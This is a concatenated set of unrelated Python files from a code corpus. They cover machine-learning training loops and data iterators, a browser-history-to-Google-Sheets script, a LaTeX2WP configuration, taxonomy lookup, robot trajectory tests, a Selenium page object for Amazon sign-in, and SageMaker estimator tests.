num_train = int(len(scans) * 0.8)
scan_aug_train, gp_aug_train, y_aug_train = scans[:num_train], gps[:num_train], ys[:num_train]
scan_aug_test, gp_aug_test, y_aug_test = scans[num_train:], gps[num_train:], ys[num_train:]
if self.full_train:
scan_train = np.concatenate([scan_train, scan_aug_train, scan_aug_test], axis=0)
gp_train = np.concatenate([gp_train, gp_aug_train, gp_aug_test], axis=0)
y_train = np.concatenate([y_train, y_aug_train, y_aug_test], axis=0)
else:
scan_train = np.concatenate([scan_train, scan_aug_train], axis=0)
gp_train = np.concatenate([gp_train, gp_aug_train], axis=0)
y_train = np.concatenate([y_train, y_aug_train], axis=0)
scan_test = np.concatenate([scan_test, scan_aug_test], axis=0)
gp_test = np.concatenate([gp_test, gp_aug_test], axis=0)
y_test = np.concatenate([y_test, y_aug_test], axis=0)
labels, counts = np.unique(y_train, return_counts=True)
weights = counts / counts.sum() * len(counts)
weights = dict(zip(*[labels, weights]))
sess = self.sess
self.writer.add_graph(sess.graph)
for i in range(self.epochs):
train_acc, train_loss, test_acc, test_loss = [], [], [], []
train_confs = []
scan_train, gp_train, y_train = shuffle(scan_train, gp_train, y_train)
for j in range(len(scan_train) // self.batch_size + 1):
batch_scan = scan_train[j:j + self.batch_size]
batch_gp = gp_train[j:j + self.batch_size]
batch_y = y_train[j:j + self.batch_size]
batch_w = np.array([weights[y] for y in batch_y])
batch_scan, batch_gp, batch_valid = self._data_augment(batch_scan, batch_gp, training=True)
batch_scan, batch_gp, batch_y, batch_w = \
batch_scan[batch_valid], batch_gp[batch_valid], batch_y[batch_valid], batch_w[batch_valid]
loss, acc, _ = sess.run([self.loss, self.acc, self.train_op],
feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.weight_ph: batch_w,
self.annealing_step_ph: 1 * (len(X_train) // self.batch_size + 1),
self.dropout_rate_ph: self.dropout_rate})
if self.use_EDL:
conf = sess.run(self.confidence,
feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.annealing_step_ph: 1 * (len(X_train) // self.batch_size + 1),
self.dropout_rate_ph: 0.0})
train_confs.extend(conf)
train_loss.extend([loss] * self.batch_size)
train_acc.extend([acc] * self.batch_size)
test_pred = []
test_confs = []
for j in range(0, len(scan_test), self.batch_size):
batch_scan = scan_test[j:j + self.batch_size]
batch_gp = gp_test[j:j + self.batch_size]
batch_y = y_test[j:j + self.batch_size]
batch_w = np.array([weights[y] for y in batch_y])
batch_scan, batch_gp, batch_valid = self._data_augment(batch_scan, batch_gp, training=False)
# batch_scan, batch_gp, batch_y = batch_scan[batch_valid], batch_gp[batch_valid], batch_y[batch_valid]
pred, loss, acc = sess.run([self.pred, self.loss, self.acc],
feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.weight_ph: batch_w,
self.annealing_step_ph: 2 ** 31 - 1,
self.dropout_rate_ph: 0.0})
if self.use_EDL:
conf = sess.run(self.confidence, feed_dict={self.scan_ph: batch_scan,
self.gp_ph: batch_gp,
self.label_ph: batch_y,
self.annealing_step_ph: 2 ** 31 - 1,
self.dropout_rate_ph: 0.0})
test_confs.extend(conf)
test_loss.extend([loss] * len(batch_scan))
test_acc.extend([acc] * len(batch_scan))
test_pred.extend(pred)
test_pred = np.array(test_pred)
test_confs = np.array(test_confs)
train_acc, train_loss = np.mean(train_acc), np.mean(train_loss)
test_acc, test_loss = np.mean(test_acc), np.mean(test_loss)
summary = tf.Summary(value=[tf.Summary.Value(tag="train/loss", simple_value=train_loss),
tf.Summary.Value(tag="train/acc", simple_value=train_acc),
tf.Summary.Value(tag="test/loss", simple_value=test_loss),
tf.Summary.Value(tag="test/acc", simple_value=test_acc)])
self.writer.add_summary(summary, i)
if self.use_EDL:
summary = tf.Summary(value=[tf.Summary.Value(tag="train/conf", simple_value=np.mean(train_confs)),
tf.Summary.Value(tag="test/conf", simple_value=np.mean(test_confs))])
self.writer.add_summary(summary, i)
summary_val = []
for j in range(self.Dy):
acc = np.mean(y_test[y_test == j] == test_pred[y_test == j])
summary_val.append(tf.Summary.Value(tag="test_acc/{}".format(j), simple_value=acc))
if self.use_EDL:
conf = np.mean(test_confs[y_test == j])
summary_val.append(tf.Summary.Value(tag="test_conf/{}".format(j), simple_value=conf))
self.writer.add_summary(tf.Summary(value=summary_val), i)
if (i + 1) % 10 == 0:
self._save_model(epoch_num=i + 1)
def predict(self, scan, gp):
in_batch = len(scan.shape) > 1
if not in_batch:
scan, gp = np.array([scan]), np.array([gp])
scan, gp, valid = self._data_augment(scan, gp, training=False)
if self.use_EDL:
pred, confidence = self.sess.run([self.pred, self.confidence], feed_dict={self.scan_ph: scan,
self.gp_ph: gp,
self.dropout_rate_ph: 0.0})
confidence[np.logical_not(valid)] = 0.0
if not in_batch:
pred, confidence = pred[0], confidence[0]
return pred, confidence
else:
pred = self.sess.run(self.pred, feed_dict={self.scan_ph: scan, self.gp_ph: gp, self.dropout_rate_ph: 0.0})
if not in_batch:
pred = pred[0]
return pred
def main():
    """Build the dataset selected by the CLI arguments and train a classifier."""
    cli_args = make_args()
    X_train, y_train, X_test, y_test = get_dataset(cli_args, draw_data=False)
    classifier = ScanClassifier(cli_args)
    classifier.train(X_train, y_train, X_test, y_test)


if __name__ == "__main__":
    main()
| StarcoderdataPython |
1695024 | <filename>filipkin.com/history.py<gh_stars>1-10
#!/usr/bin/env python
import json
from pprint import pprint
import sys
import gspread
from oauth2client.service_account import ServiceAccountCredentials
# Load the exported browser-history entries.
# BUG FIX: the original bound the parsed data to the name ``json``, shadowing
# the stdlib module, and leaked the file handle; use a context manager and a
# distinct variable name.
with open('history.json') as history_file:
    history = json.load(history_file)
scope = [
    'https://spreadsheets.google.com/feeds',
    'https://www.googleapis.com/auth/drive'
]
creds = ServiceAccountCredentials.from_json_keyfile_name(
    'client-id.json', scope)
gc = gspread.authorize(creds)
# Target spreadsheet id, passed on the command line.
sid = sys.argv[1]
# Only write if the service account can actually see that spreadsheet.
sheetfound = any(sheet['id'] == sid for sheet in gc.list_spreadsheet_files())
if sheetfound:
    ws = gc.open_by_key(sid).sheet1
    # One header row plus one row per history entry, five columns (A-E).
    ws.resize(len(history) + 1, 5)
    cells = ws.range("A2:E" + str(len(history) + 1))
    # Fill the flat cell list row by row.  Column A is intentionally left
    # blank (matching the original layout); values are truncated to stay
    # under the Google Sheets per-cell character limit.
    i = 0
    for entry in history:
        for value in ('', entry['time'], entry['title'], entry['url'], entry['id']):
            cells[i].value = str(value)[:49999]
            i += 1
    ws.update_cells(cells)
| StarcoderdataPython |
1694734 | """
Copyright 2009 <NAME>
Additional contributors: <NAME>
LaTeX2WP version 0.6.2
This file is part of LaTeX2WP, a program that converts
a LaTeX document into a format that is ready to be
copied and pasted into WordPress.
You are free to redistribute and/or modify LaTeX2WP under the
terms of the GNU General Public License (GPL), version 3
or (at your option) any later version.
I hope you will find LaTeX2WP useful, but be advised that
it comes WITHOUT ANY WARRANTY; without even the implied warranty
of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GPL for more details.
You should have received a copy of the GNU General Public
License along with LaTeX2WP. If you can't find it,
see <http://www.gnu.org/licenses/>.
"""
# Lines starting with #, like this one, are comments
# change to HTML = True to produce standard HTML
HTML = False
# color of LaTeX formulas
textcolor = "000000"
# colors that can be used in the text
colors = { "red" : "ff0000" , "green" : "00ff00" , "blue" : "0000ff" }
# list of colors defined above
colorchoice = ["red","green","blue"]
# counters for theorem-like environments
# assign any counter to any environment. Make sure that
# maxcounter is an upper bound to the any counter being used
T = { "theorem" : 0 , "lemma" : 0 , "proposition" : 0, "definition" : 0,
      "corollary" : 0, "remark" : 0 , "example" : 0, "claim" : 0,
      "exercise" : 0,
      "axiom" : 1, "problem" : 2, "ques" : 0, # Napkin
      "sproblem" : 2, "dproblem" : 2
      }
# list of theorem-like environments
# NOTE(review): on Python 3 this is a dict *view*, not a list; it still
# supports membership tests and iteration, which is presumably all the
# converter needs -- confirm before porting.
ThmEnvs = T.keys()
# the way \begin{theorem}, \begin{lemma} etc are translated in HTML
# the string _ThmType_ stands for the type of theorem
# the string _ThmNumb_ is the theorem number
box_string = "<div style=\"color: #000000 !important; border: 1px red solid;" + \
             "padding-left: 8px; padding-top: 4px; margin-bottom: 8px !important; \">"
head_string = "<p style=\"margin-bottom: 6px\"><b style=\"color: #ff4d4d !important;\">"
beginthm = "\n" + box_string + head_string + "_ThmType_ _ThmNumb_" + "</b></p>"
# translation of \begin{theorem}[...]. The string
# _ThmName_ stands for the content between the
# square brackets
beginnamedthm = "\n" + box_string + head_string + "_ThmType_ _ThmNumb_" + "</b>" + " <b>(_ThmName_)</b>" + "</p>"
#translation of \end{theorem}, \end{lemma}, etc.
endthm = "<p style=\"margin-bottom:-12px;\"></p></div>\n"
# Proof environment delimiters; the proof ends with a WordPress-rendered
# LaTeX Box symbol (QED).
beginproof = "<em>Proof:</em> "
endproof = "$latex \Box&fg=000000$\n"
beginquote = "<blockquote>\n"
endquote = "</blockquote>\n"
# Section heading templates; _SecNumb_/_SubSecNumb_ are the running
# counters and _SecName_ is the heading text.  The *star variants are for
# unnumbered \section*/\subsection*.
section = "\n<h2>_SecNumb_. _SecName_ </h2>\n"
sectionstar = "\n<h2>_SecName_</h2>\n"
subsection = "\n<h3>_SecNumb_._SubSecNumb_. _SecName_ </h3>\n"
subsectionstar = "\n<h3> _SecName_ </h3>\n"
# Font styles. Feel free to add others. The key *must* contain
# an open curly bracket. The value is the name of an HTML tag.
fontstyle = {
   r'{\em ' : 'em',
   r'{\bf ' : 'b',
   r'{\it ' : 'i',
   r'{\sl ' : 'i',
   r'\textit{' : 'i',
   r'\textsl{' : 'i',
   r'\emph{' : 'em',
   r'\textbf{' : 'b',
   r'\vocab{' : 'b',
   }
# Macro definitions
# It is a sequence of pairs [string1,string2], and
# latex2wp will replace each occurrence of string1 with an
# occurrence of string2. The substitutions are performed
# in the same order as the pairs appear below.
# Feel free to add your own.
# Note that you have to write \\ instead of \
# and \" instead of "
M = [
     [r"\ii", r"\item"] ,
     [r"\to", r"\rightarrow"] ,
     [r"\NN", r"{\mathbb N}"],
     [r"\ZZ", r"{\mathbb Z}"],
     [r"\CC", r"{\mathbb C}"],
     [r"\RR", r"{\mathbb R}"],
     [r"\QQ", r"{\mathbb Q}"],
     [r"\FF", r"{\mathbb F}"],
     [r"\OO", r"{\mathcal O}"],
     [r"\pp", r"{\mathfrak p}"],
     [r"\qq", r"{\mathfrak q}"],
     [r"\Norm", r"\text{N}"],
     [r"\End", r"\text{End}"],
     [r"\xor", r"\oplus"],
     [r"\eps", r"\epsilon"],
     [r"\dg", r"^{\circ}"],
     [r"\ol", r"\overline"],
     [r"\inv", r"^{-1}"],
     [r"\half", r"\frac{1}{2}"],
     [r"\defeq", r"\overset{\text{def}}{=}"],
     [r"\id", r"\mathrm{id}"],
     [r"\qedhere", r""], # sigh
     [r"\injto", r"\hookrightarrow"],
     [r"\img", r"\text{Im }"], # :(
     ]
| StarcoderdataPython |
1700699 | <filename>M3_feature_zone/retipyserver/test/test_vessel_classification_endpoint.py
# Retipy - Retinal Image Processing on Python
# Copyright (C) 2017 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""tests for vessel classification endpoint module"""
import json
import sys
from retipy.retina import Retina
from retipy.server import app
from unittest import TestCase
class TestVesselClassificationEndpoint(TestCase):
    """Tests for the /retipy/vessel_classification HTTP endpoints."""
    _resources = 'retipy/resources/images/'
    def setUp(self):
        base = self._resources
        self.segmented_image = Retina(None, base + 'manual.png').original_base64
        self.original_image = Retina(None, base + 'original.tif').original_base64
        self.app = app.test_client()
    def test_classification_no_success(self):
        """A POST with no payload must report failure."""
        response = self.app.post("/retipy/vessel_classification/classification")
        payload = response.get_data().decode(sys.getdefaultencoding())
        self.assertEqual(json.loads(payload), {'success': False})
| StarcoderdataPython |
4837063 | #!/usr/bin/env python
from ete3 import NCBITaxa
from argparse import ArgumentParser
import os
import pandas as pd
import sys
import re
v_re = re.compile("[0-9].[0-9]")
def main():
    """Map genome names to full NCBI taxonomic lineages.

    Reads a two-column (id <TAB> name) file, resolves each name against the
    ete3 NCBI taxonomy database, and writes a tab-separated lineage table
    (superkingdom..species) to stdout.
    """
    parser = ArgumentParser()
    parser.add_argument("namesmap", help="File with ids->names mappings")
    parser.add_argument("-t", "--taxdb", help="Taxonomy database formatted using ete3")
    args = parser.parse_args()
    # Ensure the database file exists before handing it to ete3.
    # NOTE(review): this creates an *empty* file; presumably NCBITaxa then
    # populates/rebuilds it -- confirm ete3's behaviour with an empty db.
    if not os.path.exists(args.taxdb):
        with open(args.taxdb, 'w') as fh:
            pass
    ncbi_taxa = NCBITaxa(args.taxdb)
    # Read names
    lineages = {}
    ids = {}
    ranks = ["superkingdom","phylum","class","order","family","genus","species"]
    with open(args.namesmap, 'r') as fhin:
        for line in fhin:
            line = line.rstrip()
            genome_id, name = line.split("\t")
            ids[genome_id] = name
    for genome_id, name in ids.items():
        # Initialize every rank to the empty string so the output table is
        # rectangular even for partially-resolved lineages.
        lineages[genome_id] = {}
        for rank in ranks:
            lineages[genome_id][rank] = ""
        items = name.split(" ")
        taxid = False
        # Try progressively longer prefixes of the name (at least two words)
        # until one resolves to a taxid.
        # NOTE(review): single-word names are never queried because the range
        # starts at 2 -- confirm that is intended.
        for i in range(2,len(items)+1):
            query_name = " ".join(items[0:i])
            name2taxid = ncbi_taxa.get_name_translator([query_name])
            try:
                taxid = name2taxid[query_name][0]
                break
            except KeyError:
                continue
        if not taxid:
            sys.stderr.write("No information found for:{}\n".format(genome_id))
            continue
        # Walk the full lineage and keep the names of the ranks we track.
        lineage = ncbi_taxa.get_lineage(taxid)
        rankdict = ncbi_taxa.get_rank(lineage)
        for taxid,rank in rankdict.items():
            if rank in ranks:
                rank_name = ncbi_taxa.get_taxid_translator([taxid])[taxid]
                lineages[genome_id][rank] = rank_name
    # Genomes as rows, ranks as columns, tab-separated on stdout.
    df = pd.DataFrame(lineages).T
    df = df.loc[:,ranks]
    df.index.name="genome_id"
    df.to_csv(sys.stdout, sep="\t")
if __name__ == '__main__':
    main()
| StarcoderdataPython |
160378 | <filename>src/tests/test_trajectory.py
import pytest
from unittest.mock import MagicMock
from data_logger import DataLogger
from commands.trajectories import CsvTrajectoryCommand, StateSpaceDriveCommand
from robot import Rockslide
log_trajectory = True
def test_CsvTrajectoryCommand(Notifier, sim_hooks):
    """Run the CSV trajectory command to completion under simulated time.

    NOTE(review): Notifier and sim_hooks are pytest fixtures from the test
    harness (not used directly here beyond the simulated clock) -- confirm
    their definitions in conftest.
    """
    robot = Rockslide()
    robot.robotInit()
    command = CsvTrajectoryCommand("traj1.tra")
    command.initialize()
    # The trajectory file must actually contain points.
    assert len(command.trajectory_points) != 0
    i = 0
    t = 0
    while not command.isFinished():
        command.execute()
        i += 1
        t += robot.getPeriod()
        # Advance the simulated clock so the command sees time passing.
        sim_hooks.time = t
        # Guard against a command that never finishes.
        assert t < 10
    command.end()
    command.logger.close()
def test_CsvTrajectoryCommand_unit_conversion(Notifier):
    """Check conversion of one trajectory point into per-side targets.

    BUG FIX (rename): this function was previously also named
    ``test_CsvTrajectoryCommand``, shadowing the simulation test of the same
    name defined earlier in this module, so pytest silently collected only
    this one and never ran the other.
    """
    robot = Rockslide()
    robot.robotInit()
    command = CsvTrajectoryCommand("traj1.tra")
    command.initialize()
    # One hand-built trajectory point.
    # NOTE(review): tuple layout inferred from the velocity/acceleration
    # values asserted below -- confirm against the CsvTrajectoryCommand
    # point format.
    command.trajectory_points = [(0, 0, 0, 4, -4, 2, -2, 0)]
    command.execute()
    # Expected conversion: world units -> encoder units per 100 ms
    # (drivetrain ratio, feet->meters via 0.3048, /10 for the 100 ms base).
    v = 4 * robot.drivetrain.ratio / 0.3048 / 10
    a = 2 * robot.drivetrain.ratio / 0.3048 / 10
    assert command.target_v_l == v
    assert command.target_v_r == -v
    assert command.target_a_l == a
    assert command.target_a_r == -a
class DriveSide:
def __init__(self, Ks, Kv, Ka, invert=False):
s = self
s.Ks, s.Kv, s.Ka, s.invert = Ks, Kv, Ka, invert
print("Ks: %f" % Ks)
print("Kv: %f" % Kv)
print("Ka: %f" % Ka)
self.v_mps = 0
self.a_mps2 = 0
self.pos_m = 0
def update(self, voltage, dt_s):
if self.invert:
voltage = -voltage
Ks = self.Ks
if voltage < 0: Ks = -Ks
self.pos_m += self.v_mps * dt_s
self.v_mps += self.a_mps2 * dt_s
self.a_mps2 = (voltage - Ks - self.v_mps * self.Kv) / self.Ka
def test_DriveSide():
    """Step the simulated drive side and check accel/velocity after each update."""
    side = DriveSide(Ks=1, Kv=2, Ka=3)
    # (applied voltage, expected a_mps2, expected v_mps) after each 20 ms step.
    steps = [
        (10, 3.0, 0.0),
        (10, 2.96, 0.06),
        (-10, -3.08, 0.1192),
        (-10, -3.04, 0.0576),
        (-10, -2.99, -0.00315),
    ]
    for voltage, expected_a, expected_v in steps:
        side.update(voltage, 0.02)
        assert side.a_mps2 == pytest.approx(expected_a, 0.01)
        assert side.v_mps == pytest.approx(expected_v, 0.01)
def test_DriveSide2():
    """With invert=True, positive voltage must drive the position negative."""
    side = DriveSide(Ks=1, Kv=2, Ka=3, invert=True)
    # Expected position after each successive 20 ms step at +10 V.
    for expected_pos in (0, 0, -0.0012, -0.00358):
        side.update(10, 0.02)
        assert side.pos_m == pytest.approx(expected_pos, 0.01)
def test_StateSpaceDriveCommand(Notifier):
    """Drive the state-space controller against two simulated drive sides.

    The robot's encoder/voltage reads are mocked and fed from two DriveSide
    simulations; the command must complete the straight3m.tra trajectory in
    under 10 simulated seconds.  When ``log_trajectory`` is set, every sample
    is written to a CSV for offline plotting.
    """
    global log_trajectory
    # Characterization constants: Ks in volts; Kv/Ka converted from
    # volts-per-tick units (63 ticks/ft) to volts per m/s and m/s^2.
    left_drive = DriveSide(
        Ks=1.293985,
        Kv=0.014172 * 63. / 0.3048,
        Ka=0.005938 * 63. / 0.3048)
    right_drive = DriveSide(
        Ks=1.320812,
        Kv=0.013736 * 63. / 0.3048,
        Ka=0.005938 * 63. / 0.3048)
    robot = Rockslide()
    robot.robotInit()
    # Replace sensor reads with mocks driven by the simulation below.
    robot.drivetrain.getLeftEncoder = getLeftEncoder = MagicMock()
    robot.drivetrain.getRightEncoder = getRightEncoder = MagicMock()
    robot.drivetrain.getVoltage = MagicMock(return_value=10)
    command = StateSpaceDriveCommand("straight3m.tra")
    command.initialize()
    dt = robot.getPeriod()
    t = 0
    if log_trajectory:
        logger = DataLogger("test_StateSpaceDriveCommand.csv")
        logger.log_while_disabled = True
        logger.do_print = False
        logger.add('t', lambda: t)
        logger.add('pos_l_m', lambda: left_drive.pos_m)
        logger.add('pos_r_m', lambda: right_drive.pos_m)
        logger.add('m_pos_l_m', lambda: command.y[0,0])
        logger.add('m_pos_r_m', lambda: command.y[1,0])
        logger.add('vel_l_mps', lambda: left_drive.v_mps)
        logger.add('vel_r_mps', lambda: right_drive.v_mps)
        logger.add('target_pos_l_m', lambda: command.r[0,0])
        logger.add('target_pos_r_m', lambda: command.r[2,0])
        logger.add('target_vel_l_mps', lambda: command.r[1,0])
        logger.add('target_vel_r_mps', lambda: command.r[3,0])
        logger.add('voltage', lambda: command.drivetrain.getVoltage())
        logger.add('vpl', lambda: command.drivetrain.motor_lb.get())
        logger.add('vpr', lambda: command.drivetrain.motor_rb.get())
    while not command.isFinished():
        # BUG FIX: logger only exists when log_trajectory is True; the
        # previously unconditional logger.log() raised NameError whenever
        # the flag was turned off.
        if log_trajectory:
            logger.log()
        # Feed the simulated positions back as encoder ticks (630 ticks/ft).
        getLeftEncoder.return_value = left_drive.pos_m * 630 / 0.3048
        getRightEncoder.return_value = right_drive.pos_m * 630 / 0.3048
        command.execute()
        # Apply the commanded motor outputs to the physics simulation.
        V = command.drivetrain.getVoltage()
        vpl = command.drivetrain.motor_lb.get()
        vpr = command.drivetrain.motor_rb.get()
        left_drive.update(V * vpl, dt)
        right_drive.update(V * vpr, dt)
        t += dt
        # Guard against a trajectory that never finishes.
        assert t < 10
    command.end()
| StarcoderdataPython |
1757007 | <filename>flaskapp/config/debug.py
# Flask settings for the local "debug" environment.
ENV = 'debug'
# Enable Flask's debug mode (interactive debugger + auto-reload).
DEBUG = True
# NOTE(review): HOST is usually a hostname string; False presumably means
# "use the default host" -- confirm how the app factory consumes this value.
HOST = False
PORT = 5000 | StarcoderdataPython |
137673 | import os
import sys
import mxnet as mx
def cifar100_iterator(cfg, kv):
    """Create (train, val) mx.io.ImageRecordIter pairs for CIFAR-100.

    cfg supplies the dataset directory, augmentation level and batch size;
    kv is the kvstore used to shard data across distributed workers.
    """
    train_rec = os.path.join(cfg.dataset.data_dir, "cifar100_train.rec")
    val_rec = os.path.join(cfg.dataset.data_dir, "cifar100_test.rec")
    # CIFAR-100 per-channel RGB statistics.  Normalization is currently
    # disabled: all mean_*/std_* arguments below are commented out.
    mean = [129.31, 124.11, 112.4]
    std = [68.21, 65.41, 70.41]
    train = mx.io.ImageRecordIter(
        path_imgrec = train_rec,
        label_width = 1,
        data_name = 'data',
        label_name = 'softmax_label',
        data_shape = (3, 32, 32),
        batch_size = cfg.batch_size,
        # Pad-and-random-crop augmentation (4-pixel pad, fill with gray).
        pad = 4,
        fill_value = 127,
        #mean_r = mean[0],
        #mean_g = mean[1],
        #mean_b = mean[2],
        #std_r = std[0],
        #std_g = std[1],
        #std_b = std[2],
        rand_crop = True if cfg.dataset.aug_level > 0 else False,
        rand_mirror = True if cfg.dataset.aug_level > 0 else False,
        shuffle = True if cfg.dataset.aug_level >= 0 else False,
        num_parts = kv.num_workers,
        part_index = kv.rank)
    val = mx.io.ImageRecordIter(
        path_imgrec = val_rec,
        label_width = 1,
        data_name = 'data',
        label_name = 'softmax_label',
        batch_size = cfg.batch_size,
        data_shape = (3, 32, 32),
        # BUG FIX: mean_r was the only normalization argument left active,
        # and only on this validation iterator -- the training iterator
        # applies no mean/std normalization, so validation images were
        # preprocessed differently from training images.  Disabled here for
        # consistency (re-enable the full set on BOTH iterators if
        # normalization is wanted).
        #mean_r = mean[0],
        #mean_g = mean[1],
        #mean_b = mean[2],
        #std_r = std[0],
        #std_g = std[1],
        #std_b = std[2],
        rand_crop = False,
        rand_mirror = False,
        num_parts = kv.num_workers,
        part_index = kv.rank)
    return train, val
| StarcoderdataPython |
1764533 | import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from locators.locators import LoginPageLocators
from locators.locators import RegisterPageLocators
from .base_page import BasePage
class Login(BasePage):
    """Page object for the Amazon sign-in page and its helper links."""
    def open_login_page_url(self):
        """Open the sign-in page directly via its canonical URL."""
        url = "https://www.amazon.com/ap/signin?_encoding=UTF8&openid.assoc_handle=usflex&openid."\
        "claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs."\
        "openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2."\
        "0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2F"\
        "www.amazon.com%2Fgp%2Fcss%2Fhomepage.html%3Fie%3DUTF8%26%252AVersion%252A%3D1%26%252Aentries%252A%3D0"
        self.driver.get(url)
    def open_login_page_main(self):
        """Open amazon.com and reach sign-in through the account drop menu."""
        url = "https://www.amazon.com/"
        self.driver.get(url)
        menu = self.wait_for_element(RegisterPageLocators.DROP_MENU) #The same locator
        login = self.wait_for_element(LoginPageLocators.SIGN_IN)
        action = ActionChains(self.driver)
        action.move_to_element(menu).move_to_element(login).click().perform()
    def print_title(self):
        """Print the current page title (debugging helper)."""
        print(self.driver.title)
    def is_title_matches(self):
        """Return True when the sign-in page title is displayed."""
        return "Amazon Sign-In" in self.driver.title
    def click_cont_button(self):
        """Click the Continue button on the email/phone step."""
        self.wait_to_be_clickable(LoginPageLocators.CONTINUE_BUTTON).click()
    def click_need_help_link(self):
        """Expand the 'Need help?' section."""
        self.wait_to_be_clickable(LoginPageLocators.NEED_HELP_LINK).click()
    def click_forgot_pass_link(self):
        """Click the 'Forgot your password' link (assumes help is expanded)."""
        self.wait_to_be_clickable(LoginPageLocators.FORGOT_PASS_LINK).click()
    # BUG FIX: a first click_other_issues_link definition used to be here; it
    # was dead code, silently overridden by the method of the same name
    # defined further down, so it has been removed.
    def click_create_acc_buttom(self):
        """Click the 'Create your Amazon account' button."""
        self.wait_to_be_clickable(LoginPageLocators.CREATE_ACC_BUTTON).click()
    def empty_alert(self):
        """True when the empty email/phone validation message is shown."""
        text = "Enter your email or mobile phone number"
        return text in self.wait_for_element(LoginPageLocators.EMPTY_EMAIL_PHONE).text
    def email_alert(self):
        """True when the unknown-email alert is shown."""
        text = "We cannot find an account with that email address"
        return text in self.wait_for_element(LoginPageLocators.EMAIL_PHONE_ALERT).text
    def phone_alert(self):
        """True when the unknown-phone-number alert is shown."""
        text = "We cannot find an account with that mobile number"
        return text in self.wait_for_element(LoginPageLocators.EMAIL_PHONE_ALERT).text
    def set_email_phone_input(self, text):
        """Type the given text into the email/phone field."""
        self.wait_for_element(LoginPageLocators.EMAIL_PHONE_INPUT).click()
        self.wait_for_element(LoginPageLocators.EMAIL_PHONE_INPUT).send_keys(text)
    def click_forgot_password_link(self):
        """Expand 'Need help?' and follow the forgot-password link."""
        self.wait_for_element(LoginPageLocators.NEED_HELP_LINK).click()
        self.wait_for_element(LoginPageLocators.FORGOT_PASS_LINK).click()
    def click_other_issues_link(self):
        """Expand 'Need help?' and follow the other-issues link."""
        self.wait_for_element(LoginPageLocators.NEED_HELP_LINK).click()
        self.wait_for_element(LoginPageLocators.OTHER_ISSUES_LINK).click()
    def check_valid_email(self, text):
        """True when the given text appears in the recognized-email element."""
        return text in self.wait_for_element(LoginPageLocators.VALID_EMAIL).text
    def check_forgot_password_site(self):
        """True when the password-assistance page is displayed."""
        text = "Password assistance"
        return text in self.wait_for_element(LoginPageLocators.FORGOT_PASS_SITE).text
    def check_other_issues_site(self):
        """True when the account & login issues help page is displayed."""
        text = "Account & Login Issues"
        return text in self.wait_for_element(LoginPageLocators.OTHER_ISSUES_SITE).text
    def check_create_acc_site(self):
        """True when the account-creation page is displayed."""
        text = "Create account"
        return text in self.wait_for_element(LoginPageLocators.CREATE_ACC_SITE).text
| StarcoderdataPython |
1635228 | <filename>sagemaker-pyspark-sdk/tests/sagemakerestimator_test.py
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import os
import pytest
from pyspark import SparkConf, SparkContext
from sagemaker_pyspark import (classpath_jars, SageMakerEstimator)
from sagemaker_pyspark.transformation.deserializers import KMeansProtobufResponseRowDeserializer
from sagemaker_pyspark.transformation.serializers import ProtobufRequestRowSerializer
@pytest.fixture(autouse=True)
def with_spark_context():
    """Provide a SparkContext to every test in the module (autouse).

    Creates the context at most once (reusing an already-active one), yields
    it to the test, and stops it afterwards -- the code after ``yield`` is
    the fixture teardown.
    """
    os.environ['SPARK_CLASSPATH'] = ":".join(classpath_jars())
    conf = (SparkConf()
            .set("spark.driver.extraClassPath", os.environ['SPARK_CLASSPATH']))
    # Only start a new context if none is running.
    if SparkContext._active_spark_context is None:
        SparkContext(conf=conf)
    yield SparkContext._active_spark_context
    # TearDown
    SparkContext.stop(SparkContext._active_spark_context)
def test_sagemakerestimator_passes_correct_params_to_scala():
    """Constructor arguments must be reflected on the estimator attributes."""
    params = {
        "trainingImage": "train-abc-123",
        "modelImage": "model-abc-123",
        "trainingInstanceCount": 2,
        "trainingInstanceType": "train-abc-123",
        "endpointInstanceType": "c4.8xlarge",
        "endpointInitialInstanceCount": 2,
    }
    estimator = SageMakerEstimator(
        requestRowSerializer=ProtobufRequestRowSerializer(),
        responseRowDeserializer=KMeansProtobufResponseRowDeserializer(),
        **params)
    for attr, expected in params.items():
        assert getattr(estimator, attr) == expected
def test_sagemakerestimator_default_params():
    """Unspecified constructor options must fall back to their defaults."""
    estimator = SageMakerEstimator(
        trainingImage="train-abc-123",
        modelImage="model-abc-123",
        trainingInstanceCount=2,
        trainingInstanceType="train-abc-123",
        endpointInstanceType="endpoint-abc-123",
        endpointInitialInstanceCount=2,
        requestRowSerializer=ProtobufRequestRowSerializer(),
        responseRowDeserializer=KMeansProtobufResponseRowDeserializer()
    )
    expected_defaults = {
        "trainingInstanceVolumeSizeInGB": 1024,
        "trainingChannelName": "train",
        "trainingS3DataDistribution": "ShardedByS3Key",
        "trainingSparkDataFormat": "sagemaker",
        "trainingInputMode": "File",
        "trainingMaxRuntimeInSeconds": 24 * 60 * 60,
